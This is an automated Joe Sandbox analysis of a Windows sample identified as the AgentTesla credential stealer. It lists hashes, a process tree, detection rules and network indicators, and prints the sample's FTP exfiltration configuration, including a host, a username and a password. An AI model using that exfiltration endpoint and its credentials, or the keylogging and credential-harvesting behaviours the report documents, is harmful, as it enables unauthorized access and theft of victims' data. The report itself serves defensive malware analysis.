Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
rMT103_126021720924.exe

Overview

General Information

Sample name:rMT103_126021720924.exe
Analysis ID:1546259
MD5:06ef3895bf1c5878463c502a7f1554eb
SHA1:9bb43516ca18892a0aacd7e1b0aec0666fe2c735
SHA256:c68ac751c2b84e31bd64a9d318fd5cde9c1fa7f9f9090940808fef7989b3ade9
Tags:exeuser-Porcupine
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
AI detected suspicious sample
Connects to many ports of the same IP (likely port scanning)
Contains functionality to log keystrokes (.Net Source)
Contains functionality to register a low level keyboard hook
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses FTP
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • rMT103_126021720924.exe (PID: 2828 cmdline: "C:\Users\user\Desktop\rMT103_126021720924.exe" MD5: 06EF3895BF1C5878463C502A7F1554EB)
    • rMT103_126021720924.exe (PID: 6860 cmdline: "C:\Users\user\Desktop\rMT103_126021720924.exe" MD5: 06EF3895BF1C5878463C502A7F1554EB)
  • sgxIb.exe (PID: 7248 cmdline: "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe" MD5: 06EF3895BF1C5878463C502A7F1554EB)
    • sgxIb.exe (PID: 7304 cmdline: "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe" MD5: 06EF3895BF1C5878463C502A7F1554EB)
    • sgxIb.exe (PID: 7312 cmdline: "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe" MD5: 06EF3895BF1C5878463C502A7F1554EB)
    • sgxIb.exe (PID: 7320 cmdline: "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe" MD5: 06EF3895BF1C5878463C502A7F1554EB)
  • sgxIb.exe (PID: 7644 cmdline: "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe" MD5: 06EF3895BF1C5878463C502A7F1554EB)
    • sgxIb.exe (PID: 7704 cmdline: "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe" MD5: 06EF3895BF1C5878463C502A7F1554EB)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "FTP", "Host": "ftp://ftp.haliza.com.my", "Username": "origin@haliza.com.my", "Password": "JesusChrist007$"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000000B.00000002.4171800763.000000000285C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000006.00000002.1923594429.0000000002A1C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000002.00000002.4171996023.0000000002B71000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000002.00000002.4171996023.0000000002B71000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            00000002.00000002.4171996023.0000000002B9C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              Click to see the 18 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.rMT103_126021720924.exe.48269a0.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                0.2.rMT103_126021720924.exe.48269a0.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  0.2.rMT103_126021720924.exe.48269a0.0.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                  • 0x3317c:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                  • 0x331ee:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                  • 0x33278:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                  • 0x3330a:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                  • 0x33374:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                  • 0x333e6:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                  • 0x3347c:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                  • 0x3350c:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                  0.2.rMT103_126021720924.exe.48269a0.0.unpackMALWARE_Win_AgentTeslaV2AgenetTesla Type 2 Keylogger payloadditekSHen
                  • 0x30370:$s2: GetPrivateProfileString
                  • 0x2f9fa:$s3: get_OSFullName
                  • 0x3116b:$s5: remove_Key
                  • 0x31357:$s5: remove_Key
                  • 0x32275:$s6: FtpWebRequest
                  • 0x3315e:$s7: logins
                  • 0x336d0:$s7: logins
                  • 0x36427:$s7: logins
                  • 0x36493:$s7: logins
                  • 0x37f12:$s7: logins
                  • 0x3702d:$s9: 1.85 (Hash, version 2, native byte-order)
                  6.2.sgxIb.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    Click to see the 17 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: CurrentVersion Autorun Keys Modification
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\rMT103_126021720924.exe, ProcessId: 6860, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sgxIb

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-31T17:03:17.555574+010020229301A Network Trojan was detected172.202.163.200443192.168.2.449742TCP
                    2024-10-31T17:03:44.496265+010020229301A Network Trojan was detected172.202.163.200443192.168.2.463429TCP
                    2024-10-31T17:03:45.837991+010020229301A Network Trojan was detected172.202.163.200443192.168.2.463430TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-31T17:03:18.695850+010020299271A Network Trojan was detected192.168.2.449741110.4.45.19721TCP
                    2024-10-31T17:03:26.610863+010020299271A Network Trojan was detected192.168.2.449751110.4.45.19721TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-31T17:03:19.796759+010028555421A Network Trojan was detected192.168.2.449746110.4.45.19759700TCP
                    2024-10-31T17:03:20.095892+010028555421A Network Trojan was detected192.168.2.449746110.4.45.19759700TCP
                    2024-10-31T17:03:27.637706+010028555421A Network Trojan was detected192.168.2.449752110.4.45.19760611TCP
                    2024-10-31T17:03:27.651556+010028555421A Network Trojan was detected192.168.2.449752110.4.45.19760611TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: 6.2.sgxIb.exe.400000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.haliza.com.my", "Username": "origin@haliza.com.my", "Password": "JesusChrist007$"}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeReversingLabs: Detection: 31%
                    Multi AV Scanner detection for submitted file
                    Source: rMT103_126021720924.exeReversingLabs: Detection: 31%
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: rMT103_126021720924.exeJoe Sandbox ML: detected
                    Source: rMT103_126021720924.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49732 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49740 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49750 version: TLS 1.2
                    Source: rMT103_126021720924.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.4:49752 -> 110.4.45.197:60611
                    Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.4:49746 -> 110.4.45.197:59700
                    Source: Network trafficSuricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.4:49751 -> 110.4.45.197:21
                    Source: Network trafficSuricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.4:49741 -> 110.4.45.197:21
                    Connects to many ports of the same IP (likely port scanning)
                    Source: global trafficTCP traffic: 110.4.45.197 ports 62872,53280,49938,57283,60611,50990,50153,54434,59700,53124,58830,52695,50113,49704,64321,61776,62800,1,55079,2,56246,49882,49662,52009,21,53913
                    Yara detected Generic Downloader
                    Source: Yara matchFile source: 0.2.rMT103_126021720924.exe.472a160.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.rMT103_126021720924.exe.47a8580.3.raw.unpack, type: UNPACKEDPE
                    Source: global trafficTCP traffic: 192.168.2.4:49738 -> 110.4.45.197:52695
                    Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
                    Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
                    Source: Joe Sandbox ViewIP Address: 110.4.45.197 110.4.45.197
                    Source: Joe Sandbox ViewASN Name: EXABYTES-AS-APExaBytesNetworkSdnBhdMY EXABYTES-AS-APExaBytesNetworkSdnBhdMY
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownDNS query: name: api.ipify.org
                    Source: unknownDNS query: name: api.ipify.org
                    Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.4:63430
                    Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.4:49742
                    Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.4:63429
                    Source: unknownFTP traffic detected: 110.4.45.197:21 -> 192.168.2.4:49735 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 22 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 22 of 50 allowed.220-Local time is now 00:03. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 22 of 50 allowed.220-Local time is now 00:03. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 22 of 50 allowed.220-Local time is now 00:03. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 22 of 50 allowed.220-Local time is now 00:03. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                    Source: global trafficDNS traffic detected: DNS query: ftp.haliza.com.my
                    Source: global trafficDNS traffic detected: DNS query: 15.164.165.52.in-addr.arpa
                    Source: rMT103_126021720924.exe, 00000002.00000002.4171996023.0000000002BFB000.00000004.00000800.00020000.00000000.sdmp, rMT103_126021720924.exe, 00000002.00000002.4171996023.0000000002C5C000.00000004.00000800.00020000.00000000.sdmp, rMT103_126021720924.exe, 00000002.00000002.4171996023.0000000002B9C000.00000004.00000800.00020000.00000000.sdmp, rMT103_126021720924.exe, 00000002.00000002.4171996023.0000000002D4C000.00000004.00000800.00020000.00000000.sdmp, rMT103_126021720924.exe, 00000002.00000002.4171996023.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp, rMT103_126021720924.exe, 00000002.00000002.4171996023.0000000002C8C000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000006.00000002.1923594429.0000000002A1C000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 0000000B.00000002.4171800763.000000000285C000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 0000000B.00000002.4171800763.0000000002916000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 0000000B.00000002.4171800763.0000000002948000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftp.haliza.com.my
                    Source: rMT103_126021720924.exe, 00000002.00000002.4171996023.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000006.00000002.1923594429.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 0000000B.00000002.4171800763.00000000027EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: rMT103_126021720924.exe, 00000000.00000002.1721351951.0000000006E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                    Source: rMT103_126021720924.exe, 00000000.00000002.1721351951.0000000006E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                    Source: rMT103_126021720924.exe, 00000000.00000002.1721351951.0000000006E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                    Source: rMT103_126021720924.exe, 00000000.00000002.1721351951.0000000006E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                    Source: rMT103_126021720924.exe, 00000000.00000002.1721351951.0000000006E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                    Source: rMT103_126021720924.exe, 00000000.00000002.1721351951.0000000006E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                    Source: rMT103_126021720924.exe, 00000000.00000002.1721351951.0000000006E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                    Source: rMT103_126021720924.exe, 00000000.00000002.1721351951.0000000006E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                    Source: rMT103_126021720924.exe, 00000000.00000002.1721351951.0000000006E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                    Source: rMT103_126021720924.exe, 00000000.00000002.1721351951.0000000006E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                    Source: rMT103_126021720924.exe, 00000000.00000002.1721351951.0000000006E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                    Source: rMT103_126021720924.exe, 00000000.00000002.1721351951.0000000006E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                    Source: rMT103_126021720924.exe, 00000000.00000002.1721351951.0000000006E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                    Source: rMT103_126021720924.exe, 00000000.00000002.1721351951.0000000006E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                    Source: rMT103_126021720924.exe, 00000000.00000002.1721351951.0000000006E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                    Source: rMT103_126021720924.exe, 00000000.00000002.1721351951.0000000006E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                    Source: rMT103_126021720924.exe, 00000000.00000002.1721351951.0000000006E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                    Source: rMT103_126021720924.exe, 00000000.00000002.1721351951.0000000006E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                    Source: rMT103_126021720924.exe, 00000000.00000002.1721351951.0000000006E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                    Source: rMT103_126021720924.exe, 00000000.00000002.1721351951.0000000006E82000.00000004.00000800.00020000.00000000.sdmp, rMT103_126021720924.exe, 00000000.00000002.1721207014.00000000057D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                    Source: rMT103_126021720924.exe, 00000000.00000002.1721351951.0000000006E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                    Source: rMT103_126021720924.exe, 00000000.00000002.1721351951.0000000006E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                    Source: rMT103_126021720924.exe, 00000000.00000002.1721351951.0000000006E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                    Source: rMT103_126021720924.exe, 00000000.00000002.1721351951.0000000006E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                    Source: rMT103_126021720924.exe, 00000000.00000002.1721351951.0000000006E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                    Source: rMT103_126021720924.exe, 00000000.00000002.1718690777.000000000451A000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000006.00000002.1916038959.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                    Source: rMT103_126021720924.exe, 00000000.00000002.1718690777.000000000451A000.00000004.00000800.00020000.00000000.sdmp, rMT103_126021720924.exe, 00000002.00000002.4171996023.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000006.00000002.1916038959.0000000000402000.00000040.00000400.00020000.00000000.sdmp, sgxIb.exe, 00000006.00000002.1923594429.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 0000000B.00000002.4171800763.00000000027EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                    Source: rMT103_126021720924.exe, 00000002.00000002.4171996023.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000006.00000002.1923594429.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 0000000B.00000002.4171800763.00000000027EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                    Source: rMT103_126021720924.exe, 00000002.00000002.4171996023.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000006.00000002.1923594429.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 0000000B.00000002.4171800763.00000000027EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                    Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49732 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49740 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49750 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Contains functionality to log keystrokes (.Net Source)
                    Source: 0.2.rMT103_126021720924.exe.48269a0.0.raw.unpack, SKTzxzsJw.cs.Net Code: _71ZRqC1D
                    Contains functionality to register a low level keyboard hook
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeCode function: 2_2_0685C628 SetWindowsHookExA 0000000D,00000000,?,?,?,?,?,?,?,?,?,0685D458,00000000,000000002_2_0685C628
                    Installs a global keyboard hook
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\rMT103_126021720924.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWindow created: window name: CLIPBRDWNDCLASS

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 0.2.rMT103_126021720924.exe.48269a0.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.rMT103_126021720924.exe.48269a0.0.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 6.2.sgxIb.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 6.2.sgxIb.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 0.2.rMT103_126021720924.exe.48269a0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.rMT103_126021720924.exe.48269a0.0.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 0.2.rMT103_126021720924.exe.472a160.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.rMT103_126021720924.exe.472a160.1.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 0.2.rMT103_126021720924.exe.47a8580.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.rMT103_126021720924.exe.47a8580.3.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeCode function: 0_2_01393E340_2_01393E34
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeCode function: 0_2_0139E04C0_2_0139E04C
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeCode function: 0_2_0139703A0_2_0139703A
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeCode function: 0_2_013970000_2_01397000
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeCode function: 0_2_058AC6800_2_058AC680
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeCode function: 0_2_058A56030_2_058A5603
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeCode function: 0_2_058A46000_2_058A4600
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeCode function: 0_2_058A56100_2_058A5610
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeCode function: 0_2_058AE1E90_2_058AE1E9
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeCode function: 0_2_058AE1F80_2_058AE1F8
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeCode function: 0_2_058A10690_2_058A1069
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeCode function: 0_2_058A10780_2_058A1078
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeCode function: 0_2_058A23380_2_058A2338
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeCode function: 0_2_058A23480_2_058A2348
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeCode function: 0_2_058AC2380_2_058AC238
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeCode function: 0_2_058AC2480_2_058AC248
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeCode function: 0_2_058ABE100_2_058ABE10
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeCode function: 0_2_058AD9200_2_058AD920
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeCode function: 0_2_058A58970_2_058A5897
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeCode function: 0_2_058A58A80_2_058A58A8
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeCode function: 0_2_07841A700_2_07841A70
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeCode function: 0_2_07D3E7E00_2_07D3E7E0
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeCode function: 0_2_07D3B47A0_2_07D3B47A
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeCode function: 0_2_07D321060_2_07D32106
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeCode function: 0_2_07D36CE80_2_07D36CE8
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeCode function: 0_2_07D36CD80_2_07D36CD8
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeCode function: 0_2_07D38C000_2_07D38C00
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeCode function: 0_2_07D32C380_2_07D32C38
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeCode function: 2_2_029741982_2_02974198
